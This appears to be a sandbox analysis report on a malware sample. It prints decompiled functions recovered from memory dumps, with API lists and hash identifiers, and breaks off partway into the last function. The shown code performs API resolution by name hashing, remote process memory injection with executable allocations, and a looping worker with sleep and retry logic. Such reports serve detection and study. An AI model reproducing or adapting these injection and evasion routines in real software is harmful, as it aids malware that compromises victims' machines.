                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02d520aaa1d0b6d6d3f0341f50212f7a6a71168bf493bc00282c66eedb8a6717
                          • Instruction ID: 945c7ad93c44089b3d88ffab3061e6b0294c57926cbac7ae47f00f4b21f82bad
                          • Opcode Fuzzy Hash: 02d520aaa1d0b6d6d3f0341f50212f7a6a71168bf493bc00282c66eedb8a6717
                          • Instruction Fuzzy Hash: 7051152944C3C55EE3268AA898587FBBFD2ABE6704F0C89ACD4DC07743D866840AD752
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005C35D0(intOrPtr _a4) {
                          				char _v528;
                          				void* _t12;
                          				unsigned int _t13;
                          				signed char* _t19;
                          				signed char _t20;
                          				signed char _t25;
                          				intOrPtr _t27;
                          				void* _t32;
                          				char* _t33;
                          				signed char* _t34;
                          				signed int _t35;
                          				intOrPtr _t38;
                          				intOrPtr _t39;
                          				char _t40;
                          				intOrPtr* _t42;
                          				intOrPtr* _t45;
                          
                          				_t27 =  *[fs:0x30];
                          				if(_t27 != 0) {
                          					_t38 =  *((intOrPtr*)(_t27 + 0xc));
                          					_t42 =  *((intOrPtr*)(_t38 + 0x14));
                          					if(_t42 != 0) {
                          						_t39 = _t38 + 0x14;
                          						if(_t39 != _t42) {
                          							_t19 =  &_v528;
                          							 *_t45 = _t39;
                          							do {
                          								_t12 = E005C4390(_t19,  *((intOrPtr*)(_t42 + 0x28)));
                          								_t45 = _t45 + 8;
                          								if(_t12 <= 0) {
                          									_t13 = 0;
                          									L14:
                          									if(((_t13 >> 0x0000000b ^ _t13) << 0xf) + (_t13 >> 0x0000000b ^ _t13) == _a4) {
                          										return  *((intOrPtr*)(_t42 + 0x10));
                          									}
                          									goto L15;
                          								}
                          								_t34 = _t19;
                          								_t32 = _t12 + 1;
                          								do {
                          									_t20 =  *_t34;
                          									if(_t20 == 0) {
                          										break;
                          									}
                          									_t25 = _t20 + 0xbf;
                          									if(_t25 <= 0x19) {
                          										 *_t34 = _t25 | 0x00000020;
                          									}
                          									_t32 = _t32 - 1;
                          									_t34 =  &(_t34[1]);
                          								} while (_t32 > 1);
                          								_t35 = 0;
                          								_t33 =  &_v528;
                          								do {
                          									_t40 =  *_t33;
                          									_t33 = _t33 + 1;
                          									_t35 = (_t40 + _t35 << 0x0000000a) + _t40 + _t35 >> 0x00000006 ^ (_t40 + _t35 << 0x0000000a) + _t40 + _t35;
                          									_t12 = _t12 - 1;
                          								} while (_t12 != 0);
                          								_t39 =  *_t45;
                          								_t13 = _t35 + _t35 * 8;
                          								goto L14;
                          								L15:
                          								_t42 =  *_t42;
                          								_t19 =  &_v528;
                          							} while (_t39 != _t42);
                          							return 0;
                          						}
                          					}
                          				}
                          				return 0;
                          			}


                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7621d7489aa0096e337dc9dfcb852a2d3ba525b4feec683653574ba13adb86e1
                          • Instruction ID: a198e8154180a7a9ccfd4ce4b25d7dc965c8a4b1ddc8185a3585015ce206ff50
                          • Opcode Fuzzy Hash: 7621d7489aa0096e337dc9dfcb852a2d3ba525b4feec683653574ba13adb86e1
                          • Instruction Fuzzy Hash: B72168327042486FD72489A8C890F6ABBE1FBC4750F1D892CC486C7341E630ED85C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005D3DF0(void* __ecx) {
                          				intOrPtr _v44;
                          				intOrPtr _v84;
                          				char _v128;
                          				int _t25;
                          				void* _t33;
                          				void* _t34;
                          				DWORD* _t40;
                          				void* _t50;
                          				void* _t53;
                          				void* _t54;
                          				DWORD* _t55;
                          
                          				_t53 = __ecx;
                          				_t40 = _t55;
                          				_t54 =  &_v128;
                          				 *_t40 = 0;
                          				_t25 = ReadProcessMemory( *(__ecx + 0x70),  *(__ecx + 0x94), _t54, 0x70, _t40);
                          				_t50 = 0;
                          				if(_t25 != 0 &&  *_t55 == 0x70) {
                          					_v84 = 2;
                          					 *_t55 = 0;
                          					if(WriteProcessMemory( *(_t53 + 0x70),  *(_t53 + 0x94), _t54, 0x70, _t40) != 0 &&  *_t55 == 0x70 && E005CB710(_t28, _t53) != 0) {
                          						 *_t55 = 0;
                          						if(ReadProcessMemory( *(_t53 + 0x70),  *(_t53 + 0x94), _t54, 0x70, _t40) != 0 &&  *_t55 == 0x70 && _v44 != 0 && WaitForSingleObject( *(_t53 + 0x74), 0xffffffff) == 0) {
                          							_t33 =  *(_t53 + 0x94);
                          							if(_t33 != 0) {
                          								VirtualFreeEx( *(_t53 + 0x70), _t33, 0, 0x8000);
                          							}
                          							_t34 =  *(_t53 + 0x98);
                          							if(_t34 != 0) {
                          								VirtualFreeEx( *(_t53 + 0x70), _t34, 0, 0x8000);
                          							}
                          							 *(_t53 + 0x94) = 0;
                          							 *(_t53 + 0x98) = 0;
                          							 *((intOrPtr*)(_t53 + 0x7c)) = 0;
                          							CloseHandle( *(_t53 + 0x88));
                          							 *(_t53 + 0x88) = 0;
                          							CloseHandle( *(_t53 + 0x8c));
                          							 *(_t53 + 0x8c) = 0;
                          							CloseHandle( *(_t53 + 0x90));
                          							 *(_t53 + 0x90) = 0;
                          							_t50 = 1;
                          						}
                          					}
                          				}
                          				return _t50;
                          			}

                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3E18
                          • WriteProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3E54
                            • Part of subcall function 005CB710: SignalObjectAndWait.KERNEL32(?,?,00007530,00000000), ref: 005CB731
                            • Part of subcall function 005CB710: GetExitCodeThread.KERNEL32(?,?,?,?,005D3E73), ref: 005CB753
                            • Part of subcall function 005CB710: WaitForSingleObject.KERNEL32(?,000001F4), ref: 005CB76F
                          • ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3E95
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005D3EBD
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005D3EDC
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005D3EF7
                          • CloseHandle.KERNEL32(?), ref: 005D3F1A
                          • CloseHandle.KERNEL32(?), ref: 005D3F28
                          • CloseHandle.KERNEL32(?), ref: 005D3F36
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CloseHandleMemoryObjectProcessWait$FreeReadSingleVirtual$CodeExitSignalThreadWrite
                          • String ID: p$p$p
                          • API String ID: 3929978480-3854358385
                          • Opcode ID: 45d759241020f19da12a2530c7cad9abbeef085c3e7a45a82ff29244400b909b
                          • Instruction ID: d35c57c6c3ccb748d943b81de0288dbadff0ae4c6edd2bbf880a740c8c4fe766
                          • Opcode Fuzzy Hash: 45d759241020f19da12a2530c7cad9abbeef085c3e7a45a82ff29244400b909b
                          • Instruction Fuzzy Hash: 71311670A10605AFE7309B39CC48F67BBE9FB84744F10491FE99A862A0CA75AD45CB21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E005CD9C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, intOrPtr* _a24, intOrPtr* _a28, void* _a32) {
                          				long _v20;
                          				void _v28;
                          				void** _v36;
                          				void* _v40;
                          				void* _v44;
                          				void* _v48;
                          				void* _v52;
                          				void* _v56;
                          				void _v60;
                          				long _v64;
                          				void* _t68;
                          				void* _t70;
                          				void* _t71;
                          				void* _t72;
                          				void* _t73;
                          				void* _t74;
                          				void* _t83;
                          				void* _t93;
                          				void* _t98;
                          				long _t101;
                          				long _t102;
                          				intOrPtr _t107;
                          				long _t113;
                          				long* _t114;
                          				intOrPtr _t120;
                          				void* _t121;
                          				intOrPtr* _t122;
                          				DWORD* _t123;
                          				void* _t124;
                          				intOrPtr* _t125;
                          				void* _t126;
                          				DWORD* _t128;
                          
                          				_t124 = __ecx;
                          				_t113 = 0;
                          				_t68 = memset( &_v60, 0, 0xb << 2);
                          				_t128 =  &(( &_v52)[3]);
                          				if( *((intOrPtr*)(_t124 + 0x80)) == 0) {
                          					L39:
                          					return _t113;
                          				}
                          				_t120 = _a8;
                          				_t101 = 0;
                          				_v64 = 0;
                          				if(_t120 == 0) {
                          					L3:
                          					if(_a16 == 0) {
                          						L5:
                          						_t121 = 0;
                          						_t126 = 0;
                          						if(_a20 == 0) {
                          							L7:
                          							if(_a32 == 0) {
                          								L9:
                          								_t70 = VirtualAllocEx( *(_t124 + 0x70), 0, 8, 0x3000, 0x40);
                          								_v44 = _t70;
                          								if(_t70 == 0) {
                          									L26:
                          									_t71 = _v44;
                          									if(_t71 != 0) {
                          										VirtualFreeEx( *(_t124 + 0x70), _t71, 0, 0x8000);
                          									}
                          									_t72 = _v52;
                          									if(_t72 != 0) {
                          										VirtualFreeEx( *(_t124 + 0x70), _t72, 0, 0x8000);
                          									}
                          									_t73 = _v48;
                          									if(_t73 != 0) {
                          										VirtualFreeEx( *(_t124 + 0x70), _t73, 0, 0x8000);
                          									}
                          									_t74 = _v60;
                          									if(_t74 != 0) {
                          										VirtualFreeEx( *(_t124 + 0x70), _t74, 0, 0x8000);
                          									}
                          									_t113 = _v20;
                          									_t122 = _a28;
                          									_t125 = _a24;
                          									if(_t113 == 0) {
                          										_t77 = _v36;
                          										if(_v36 == 0) {
                          											_t113 = 0;
                          										} else {
                          											E005C91E0(_t77);
                          											_t113 = _v20;
                          										}
                          									}
                          									 *_t122 = _v28;
                          									 *_t125 = _v36;
                          									goto L39;
                          								}
                          								_t114 =  &_v20;
                          								_t107 = _t70 + 4;
                          								 *(_t114 - 0x14) = _t70;
                          								 *((intOrPtr*)(_t114 - 0xc)) = _t107;
                          								_push(0);
                          								_push(_t121);
                          								_push(_t107);
                          								_push(_t70);
                          								_push(_t126);
                          								_push(_a16);
                          								_push(_v64);
                          								_push(_t101);
                          								_push(_a4);
                          								_push(_t114);
                          								_push(9);
                          								_push( *((intOrPtr*)(_t124 + 0xa4)));
                          								_push(_t124);
                          								_t83 = E005D3FA0();
                          								_t128 =  &(_t128[0xd]);
                          								if(_t83 == 0 || _v20 == 0) {
                          									goto L26;
                          								} else {
                          									_t123 = _t128;
                          									 *_t123 = 0;
                          									if(ReadProcessMemory( *(_t124 + 0x70), _v52, _a32, 0x80, _t123) == 0 ||  *_t128 != 0x80) {
                          										L25:
                          										_v20 = 0;
                          										goto L26;
                          									} else {
                          										 *_t128 = 0;
                          										if(ReadProcessMemory( *(_t124 + 0x70), _v56, _a20, 0x400, _t123) == 0 ||  *_t128 != 0x400) {
                          											goto L25;
                          										} else {
                          											 *_t128 = 0;
                          											if(ReadProcessMemory( *(_t124 + 0x70),  *( &_v28 - 4),  &_v28, 4, _t123) == 0 ||  *_t128 != 4) {
                          												goto L25;
                          											} else {
                          												_t91 = _v28;
                          												if(_v28 == 0) {
                          													goto L26;
                          												}
                          												_t93 = E005C3180(_t91 + 4, 0);
                          												_t128 =  &(_t128[2]);
                          												_v36 = _t93;
                          												if(_t93 == 0) {
                          													goto L25;
                          												}
                          												 *_t128 = 0;
                          												if(ReadProcessMemory( *(_t124 + 0x70), _v40, _t93, 4, _t123) == 0 ||  *_t128 != 4) {
                          													goto L25;
                          												} else {
                          													_t102 = _v28;
                          													 *_t128 = 0;
                          													if(ReadProcessMemory( *(_t124 + 0x70),  *_v36,  &(_v36[1]), _t102, _t123) == 0 ||  *_t128 != _t102) {
                          														goto L25;
                          													} else {
                          														_v36 =  &(_v36[1]);
                          														goto L26;
                          													}
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          							_t98 = E005C9CD0(_t68,  *(_t124 + 0x70), _a32, 0x80);
                          							_t128 =  &(_t128[3]);
                          							_t121 = _t98;
                          							_v52 = _t98;
                          							if(_t98 == 0) {
                          								goto L26;
                          							}
                          							goto L9;
                          						}
                          						_t68 = E005C9CD0(_t68,  *(_t124 + 0x70), _a20, 0x400);
                          						_t128 =  &(_t128[3]);
                          						_t126 = _t68;
                          						_v56 = _t68;
                          						if(_t68 == 0) {
                          							goto L26;
                          						}
                          						goto L7;
                          					}
                          					_t68 = E005C9CD0(_t68,  *(_t124 + 0x70), _a12, _a16);
                          					_t128 =  &(_t128[3]);
                          					_v48 = _t68;
                          					_v64 = _t68;
                          					if(_t68 == 0) {
                          						goto L26;
                          					}
                          					goto L5;
                          				}
                          				_v28 =  *0x5d9d28(_t120) + 1;
                          				_t68 = E005C9CD0( *0x5d9d28(_t120) + 1,  *(_t124 + 0x70), _t120,  *0x5d9d28(_t120) + 1);
                          				_t128 =  &(_t128[3]);
                          				_t101 = _t68;
                          				_v64 = _t68;
                          				if(_t68 == 0) {
                          					goto L26;
                          				}
                          				goto L3;
                          			}

                          APIs
                          • lstrlen.KERNEL32(?), ref: 005CD9FB
                            • Part of subcall function 005C9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
                            • Part of subcall function 005C9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07
                          • VirtualAllocEx.KERNEL32(?,00000000,00000008,00003000,00000040), ref: 005CDAB2
                          • ReadProcessMemory.KERNEL32(?,?,?,00000080), ref: 005CDB27
                          • ReadProcessMemory.KERNEL32(?,?,?,00000400), ref: 005CDB5C
                          • ReadProcessMemory.KERNEL32(?,?,?,00000004), ref: 005CDB8E
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • ReadProcessMemory.KERNEL32(?,?,00000000,00000004), ref: 005CDBD0
                          • ReadProcessMemory.KERNEL32(?,?,?,?), ref: 005CDBFC
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CDC2D
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CDC46
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CDC5F
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CDC78
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Process$MemoryVirtual$Read$Free$AllocHeap$AllocateWritelstrlen
                          • String ID:
                          • API String ID: 1902996647-0
                          • Opcode ID: 625c2ccfe7a9d0db5d2a5fff9001537cbdfa72141ffe86a0946f4ab570daffcc
                          • Instruction ID: ac4ea215721bb12e39a913081e044216810a3ed50358bebc2fc7f937ffebdd9c
                          • Opcode Fuzzy Hash: 625c2ccfe7a9d0db5d2a5fff9001537cbdfa72141ffe86a0946f4ab570daffcc
                          • Instruction Fuzzy Hash: 7F81E1B5604701AFE7219F65CC49F2BBBF9BB84700F04482DF985D62A0E6B4EC45DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E005D13A0(void* __eflags) {
                          				intOrPtr _t55;
                          				intOrPtr _t71;
                          				intOrPtr* _t72;
                          				unsigned int _t84;
                          				WCHAR* _t87;
                          				signed int* _t90;
                          				void* _t91;
                          				WCHAR* _t98;
                          				void* _t103;
                          				signed int _t107;
                          				intOrPtr _t114;
                          				intOrPtr* _t120;
                          				signed int _t121;
                          				signed short _t122;
                          				intOrPtr* _t123;
                          				WCHAR* _t124;
                          				void* _t125;
                          				void* _t126;
                          				signed int _t127;
                          				signed int* _t128;
                          				signed int* _t131;
                          				signed int* _t132;
                          
                          				_t127 = _t128[0x10d];
                          				E005CD8B0( &(_t128[2]));
                          				_t124 = 0x5d9bbc;
                          				 *0x5d9d54(0x5d9bbc);
                          				_t98 =  *0x5d9b7c; // 0x0
                          				 *0x5d9d9c(0x5d9bbc);
                          				if( *0x5d9ad0 == 0) {
                          					if( *(_t127 + 4) != 0) {
                          						_t124 =  &(_t128[8]);
                          						E005D4520(_t124, 0x6a);
                          						_t128 =  &(_t128[2]);
                          						if(lstrcmpiW( *(_t127 + 4), _t124) == 0) {
                          							 *0x5d9ad0 = 1;
                          						}
                          					}
                          				}
                          				if( *((intOrPtr*)(_t127 + 0x10)) == 0) {
                          					L8:
                          					_t120 =  *0x5d9d54;
                          					 *_t128 = 0;
                          					do {
                          						 *_t120(0x5d9bbc);
                          						_t55 =  *0x5d9ac8; // 0x0
                          						if(_t98 >= E005CC430( *((intOrPtr*)(_t55 + 0xc)))) {
                          							L30:
                          							 *0x5d9d9c(0x5d9bbc);
                          							L31:
                          							_t98 = 0;
                          							goto L32;
                          						}
                          						_t71 =  *0x5d9ac8; // 0x0
                          						_t72 = E005C42F0( *((intOrPtr*)(_t71 + 0xc)), _t98);
                          						_t114 =  *_t72;
                          						_t103 = 0xfffffc00;
                          						while(1) {
                          							_t121 =  *(_t114 + _t103 + 0x400) & 0x0000ffff;
                          							if(_t121 == 0) {
                          								break;
                          							}
                          							 *(_t128 + _t103 + 0x420) = _t121;
                          							_t103 = _t103 + 2;
                          							if(_t103 != 0) {
                          								continue;
                          							}
                          							_t120 =  *0x5d9d54;
                          							 *((short*)(_t128 + _t103 + 0x41e)) = 0;
                          							goto L30;
                          						}
                          						 *(_t128 + _t103 + 0x420) = 0;
                          						_t122 =  *(_t72 + 4) & 0x0000ffff;
                          						 *0x5d9d9c(0x5d9bbc);
                          						_t98 = _t98 + 1;
                          						if(_t98 == 0) {
                          							_t120 =  *0x5d9d54;
                          							goto L31;
                          						}
                          						_t125 = 0;
                          						while(E005CF070( &(_t128[2]),  &(_t128[9]), _t122 & 0x0000ffff) == 0) {
                          							_t125 = _t125 + 1;
                          							if(_t125 < 5) {
                          								continue;
                          							}
                          							L20:
                          							_t120 =  *0x5d9d54;
                          							if( *_t128 > 0x4af) {
                          								goto L33;
                          							}
                          							_t107 =  *_t128 + 1;
                          							 *_t128 = _t107;
                          							if(_t107 == (_t107 * 0x66666667 >> 0x20 >> 2) + (0x66666667 >> 0x1f) + (_t107 * 0x66666667 >> 0x20 >> 2) + (0x66666667 >> 0x1f) + 0x19999999c) {
                          								_push(0xea60);
                          							} else {
                          								_push(0xbb8);
                          							}
                          							Sleep();
                          							goto L32;
                          						}
                          						_t126 = 0;
                          						while(E005D4A60( &(_t128[8]),  *_t127,  *(_t127 + 4),  *((intOrPtr*)(_t127 + 8)),  *((intOrPtr*)(_t127 + 0xc)),  *((intOrPtr*)(_t127 + 0x10)),  *(_t127 + 0x14)) == 0) {
                          							Sleep(0x3e8);
                          							_t126 = _t126 + 1;
                          							if(_t126 < 3) {
                          								continue;
                          							}
                          							goto L20;
                          						}
                          						_t124 = 0;
                          						goto L20;
                          						L32:
                          					} while (_t124 > 0);
                          					L33:
                          					_t58 =  *_t127;
                          					if( *_t127 != 0) {
                          						E005C91E0(_t58);
                          						_t128 =  &(_t128[1]);
                          					}
                          					_t59 =  *(_t127 + 4);
                          					if( *(_t127 + 4) != 0) {
                          						E005C91E0(_t59);
                          						_t128 =  &(_t128[1]);
                          					}
                          					_t60 =  *((intOrPtr*)(_t127 + 8));
                          					if( *((intOrPtr*)(_t127 + 8)) != 0) {
                          						E005C91E0(_t60);
                          						_t128 =  &(_t128[1]);
                          					}
                          					_t61 =  *((intOrPtr*)(_t127 + 0x10));
                          					if( *((intOrPtr*)(_t127 + 0x10)) != 0) {
                          						E005C91E0(_t61);
                          						_t128 =  &(_t128[1]);
                          					}
                          					_t62 =  *((intOrPtr*)(_t127 + 0xc));
                          					if( *((intOrPtr*)(_t127 + 0xc)) != 0) {
                          						E005C91E0(_t62);
                          						_t128 =  &(_t128[1]);
                          					}
                          					E005C91E0(_t127);
                          					E005D19C0( &(_t128[3]));
                          					return 0;
                          				} else {
                          					_t84 =  *(_t127 + 0x14);
                          					if(_t84 < 0x100000) {
                          						goto L8;
                          					}
                          					_t124 = 0;
                          					_t128[1] = _t84 + (_t84 >> 4) + 0x4c;
                          					_t123 = E005C3180(_t84 + (_t84 >> 4) + 0x4c, 0);
                          					_t87 = E005C3180(0x10000, 0);
                          					_t128 =  &(_t128[4]);
                          					if(_t123 == 0) {
                          						goto L8;
                          					}
                          					_t124 = _t87;
                          					if(_t87 == 0) {
                          						goto L8;
                          					}
                          					E005D2BA0(0x1040, 2, 4, 4, 4, 4, 4, 4, 4, 4);
                          					_t131 =  &(_t128[0xa]);
                          					_t90 =  &(_t131[1]);
                          					 *_t90 =  *_t90 + 0xfffffff8;
                          					_push(_t124);
                          					_push(_t90);
                          					_push(_t123 + 8);
                          					_push( *(_t127 + 0x14));
                          					_push( *((intOrPtr*)(_t127 + 0x10)));
                          					_t91 = E005D35E0();
                          					_t132 =  &(_t131[5]);
                          					if(_t91 == 0) {
                          						 *_t123 = 0x4150495a;
                          						 *(_t123 + 4) =  *(_t127 + 0x14);
                          						 *((intOrPtr*)(_t127 + 0x10)) = _t123;
                          						_t123 =  *((intOrPtr*)(_t127 + 0x10));
                          						 *(_t127 + 0x14) = _t132[1] + 8;
                          					}
                          					E005C91E0(_t123);
                          					E005C91E0(_t124);
                          					_t128 =  &(_t132[2]);
                          					goto L8;
                          				}
                          			}

























                          Statement addresses (one entry per line of the C code above, in order):
                          0x005d13aa 0x005d13b5 0x005d13ba 0x005d13c0 0x005d13c6 0x005d13cd 0x005d13da 0x005d1656
                          0x005d165c 0x005d1663 0x005d1668 0x005d1677 0x005d167d 0x005d167d 0x005d1677 0x005d1656
                          0x005d13e4 0x005d1498 0x005d1498 0x005d149e 0x005d1575 0x005d157a 0x005d157c 0x005d158b
                          0x005d15d0 0x005d15d5 0x005d15db 0x005d15db 0x00000000 0x005d15db 0x005d158d 0x005d1596
                          0x005d159b 0x005d159d 0x005d15a2 0x005d15a2 0x005d15ad 0x00000000 0x00000000 0x005d15b3
                          0x005d15bb 0x005d15be 0x00000000 0x00000000 0x005d15c0 0x005d15c6 0x00000000 0x005d15c6
                          0x005d14aa 0x005d14b4 0x005d14bd 0x005d14c3 0x005d14c4 0x005d14e6 0x00000000 0x005d14e6
                          0x005d14c6 0x005d14c8 0x005d14de 0x005d14e2 0x00000000 0x00000000 0x005d152b 0x005d1532
                          0x005d1538 0x00000000 0x00000000 0x005d1546 0x005d1549 0x005d155f 0x005d1568 0x005d1561
                          0x005d1561 0x005d1561 0x005d156d 0x00000000 0x005d156d 0x005d14f1 0x005d14f3 0x005d151b
                          0x005d1521 0x005d1525 0x00000000 0x00000000 0x00000000 0x005d1527 0x005d1529 0x00000000
                          0x005d15dd 0x005d15dd 0x005d15e1 0x005d15e1 0x005d15e6 0x005d15e9 0x005d15ee 0x005d15ee
                          0x005d15f1 0x005d15f6 0x005d15f9 0x005d15fe 0x005d15fe 0x005d1601 0x005d1606 0x005d1609
                          0x005d160e 0x005d160e 0x005d1611 0x005d1616 0x005d1619 0x005d161e 0x005d161e 0x005d1621
                          0x005d1626 0x005d1629 0x005d162e 0x005d162e 0x005d1632 0x005d163e 0x005d164f 0x005d13ea
                          0x005d13ea 0x005d13f2 0x00000000 0x00000000 0x005d13fa 0x005d1403 0x005d1411 0x005d1419
                          0x005d141e 0x005d1423 0x00000000 0x00000000 0x005d1425 0x005d1429 0x00000000 0x00000000
                          0x005d143f 0x005d1444 0x005d1447 0x005d144d 0x005d1453 0x005d1454 0x005d1455 0x005d1456
                          0x005d1459 0x005d145c 0x005d1461 0x005d1466 0x005d1468 0x005d1471 0x005d1477 0x005d147e
                          0x005d1483 0x005d1483 0x005d1487 0x005d1490 0x005d1495 0x00000000 0x005d1495

                          APIs
                            • Part of subcall function 005CD8B0: InitializeCriticalSectionAndSpinCount.KERNEL32(005D9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 005CD916
                            • Part of subcall function 005CD8B0: RtlEnterCriticalSection.NTDLL(005D9B64), ref: 005CD928
                            • Part of subcall function 005CD8B0: RtlLeaveCriticalSection.NTDLL(005D9B64), ref: 005CD93C
                          • RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D13C0
                          • RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D13CD
                          • RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D14BD
                          • Sleep.KERNEL32(000003E8,?,?,00000000,?,?,00000000,?,?,00000000), ref: 005D151B
                          • Sleep.KERNEL32(0000EA60,?,?,00000000,?,?,00000000,?,?,00000000), ref: 005D156D
                          • RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D157A
                          • RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D15D5
                          • lstrcmpiW.KERNEL32(00000000,?), ref: 005D166F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter$Sleep$CountInitializeSpinlstrcmpi
                          • String ID: gfff
                          • API String ID: 4220677202-1553575800
                          • Opcode ID: 4350914b4d6938443723becdb85ee9b487d4fd83eed34493bd110aa08a6d74c4
                          • Instruction ID: 2f2ba7584aec10955660f4b6d6202a2e79d92af1814182749ab442f39ecf24fe
                          • Opcode Fuzzy Hash: 4350914b4d6938443723becdb85ee9b487d4fd83eed34493bd110aa08a6d74c4
                          • Instruction Fuzzy Hash: D67116B1604602AFDB30EF68EC49AAA3BA5BF94344F09442BF90697351E734D904CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			// Builds a wide string in a freshly allocated buffer and returns it through _a4 (return value 1 on success, 0 otherwise).
                          			// The string is assembled from string-table entries #0x34..#0x3f, the account name of either the current
                          			// process token's SID (_a8 == 0) or a SID with sub-authority 18 (_a8 != 0), a timestamp one minute ahead of
                          			// local time, and the caller-supplied _a12. Comments below are editorial annotations of the decompiler output.
                          			E005C26D0(intOrPtr* _a4, intOrPtr _a8, signed short* _a12) {
                          				void* _v16;
                          				char _v536;
                          				char _v1044;
                          				char _v1048;
                          				char _v1556;
                          				char _v1560;
                          				void _v1632;
                          				intOrPtr _v1636;
                          				char _v1694;
                          				signed short _v1696;
                          				char _v1712;
                          				struct _FILETIME _v1724;
                          				short _v1728;
                          				struct _SID_IDENTIFIER_AUTHORITY _v1732;
                          				char _v1736;
                          				char _v1740;
                          				intOrPtr _v1744;
                          				signed int _v1748;
                          				signed int _v1752;
                          				void* _v1756;
                          				void* _v1760;
                          				char _v1764;
                          				signed int _v1768;
                          				void* _t95;
                          				void* _t96;
                          				signed int _t109;
                          				signed int _t111;
                          				signed int _t112;
                          				signed int _t113;
                          				FILETIME* _t118;
                          				signed int _t129;
                          				signed int _t130;
                          				signed int _t131;
                          				signed int _t132;
                          				signed int* _t133;
                          				signed int _t138;
                          				signed int _t139;
                          				signed int _t140;
                          				signed int _t141;
                          				WCHAR* _t143;
                          				signed int _t147;
                          				WCHAR* _t154;
                          				intOrPtr* _t155;
                          				signed short* _t156;
                          				signed short* _t164;
                          				signed int _t165;
                          				signed short* _t166;
                          				signed short* _t167;
                          				signed short* _t168;
                          				BYTE[6] _t176;
                          				long _t181;
                          				intOrPtr _t184;
                          				signed int* _t185;
                          				signed short* _t186;
                          				signed short* _t188;
                          				void* _t192;
                          				void* _t193;
                          				signed int* _t194;
                          				void* _t195;
                          				void* _t196;
                          				struct _SYSTEMTIME* _t197;
                          				signed int* _t199;
                          				signed int* _t200;
                          				WCHAR* _t201;
                          				signed int _t203;
                          				signed int* _t205;
                          				signed int* _t209;
                          				signed int* _t211;
                          				signed int* _t212;
                          				signed int* _t216;
                          				signed int* _t217;
                          				signed int* _t221;
                          				signed int* _t222;
                          				signed int* _t223;
                          
                          				_t205 = (_t203 & 0xfffffff8) - 0x6d8;
